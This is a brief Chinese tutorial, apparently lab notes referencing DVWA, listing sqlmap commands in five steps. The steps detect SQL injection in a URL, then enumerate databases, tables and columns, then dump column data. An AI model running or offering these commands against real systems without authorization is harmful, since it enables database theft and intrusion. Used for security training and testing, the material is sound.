1、檢測url是否存在注入
sqlmap -u "url" --batch ,--batch是讓sqlmap自動選擇執行過程中出現的詢問請求
如果存在注入,就出提示某個參數是可被攻擊的,如下圖;
2、列出系統所有的數據庫名
sqlmap -u "url" --dbs --batch
在最後就會出現數據庫名:
3、得到了數據庫名,然後就是爆表名:
sqlmap -u "url" -D 數據庫名 --tables
得到dvwa數據庫所有的表名
4、有了表名,然後爆列名
sqlmap -u "url" -D 數據庫名 -T 表名 --columns
被報出來的列名
5、列出某列的數據
sqlmap -u url -D 數據庫名 -T 表名 -C "列名,列名" --dump --batch